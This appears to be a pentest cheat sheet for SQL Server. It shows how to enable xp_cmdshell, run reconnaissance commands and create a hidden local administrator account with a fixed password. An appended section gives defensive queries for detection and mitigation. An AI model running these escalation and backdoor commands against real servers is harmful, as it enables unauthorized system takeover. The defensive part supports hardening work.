0x01 Prerequisites
- getshell, or a SQL injection through which commands can be executed.
- SQL Server is running with SYSTEM privileges; SQL Server runs as SYSTEM by default.
0x02 xp_cmdshell
With xp_cmdshell you can execute system commands. The component is disabled by default, so it has to be enabled first.
Enable xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure;
Disable xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell', 0;reconfigure
0x03 Privilege escalation
exec master..xp_cmdshell 'net user test pinohd123. /add' -- adds the user test with password pinohd123.
exec master..xp_cmdshell 'net localgroup administrators test /add' -- adds the user test to the Administrators group
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' -- check whether xp_cmdshell exists (1 = present)
sp_configure 'show advanced options',1;
reconfigure;
go
sp_configure 'xp_cmdshell',1
reconfigure
go
exec master..xp_cmdshell 'systeminfo'
exec master..xp_cmdshell 'tasklist'
exec master..xp_cmdshell 'NET USER'
exec master..xp_cmdshell 'whoami'
exec master..xp_cmdshell 'net user masa pinohd123. /add'
exec master..xp_cmdshell 'net localgroup administrators masa /add'
exec master..xp_cmdshell 'net user masa /delete'
exec master..xp_cmdshell 'net localgroup administrators masa /delete'
sp_configure 'xp_cmdshell',0
reconfigure
go
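A defensive counterpart to the sequence above, added here and not part of the original notes: it reports whether xp_cmdshell is currently enabled, which account the Database Engine really runs as (on SQL Server 2012 and later the default is a per-service virtual account rather than LocalSystem, so the SYSTEM assumption in 0x01 should be verified rather than taken for granted), searches the error log for the "Configuration option 'xp_cmdshell' changed" entries that enabling or disabling it always writes, and turns the feature off again. It assumes SQL Server 2008 R2 or later for sys.dm_server_services, and xp_readerrorlog is undocumented but long-standing.

```sql
-- Added defensive check, not part of the original notes.
-- 1. Current state: value_in_use = 1 means xp_cmdshell is enabled right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Account the Database Engine runs as. 'LocalSystem' means a shell
--    from xp_cmdshell is SYSTEM; 'NT Service\MSSQLSERVER' is the modern
--    lower-privileged default. Requires SQL Server 2008 R2 or later.
SELECT servicename, service_account
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';

-- 3. Who can (re-)enable it: every sysadmin member, whatever the current
--    setting, so this list is what actually needs reviewing.
SELECT sp.name, sp.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r  ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals AS sp ON rm.member_principal_id = sp.principal_id
WHERE r.name = 'sysadmin';

-- 4. Detection: sp_configure writes a line to the SQL error log each time
--    the option changes. Log 0 is the current log; type 1 = SQL error log.
--    Any hit in the current log is worth correlating with a login/session.
EXEC master.dbo.xp_readerrorlog 0, 1, N'Configuration option ''xp_cmdshell''';

-- 5. Mitigation: disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Run it as a sysadmin; on an instance where xp_cmdshell was never toggled, step 4 returns no rows, which is the expected baseline.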
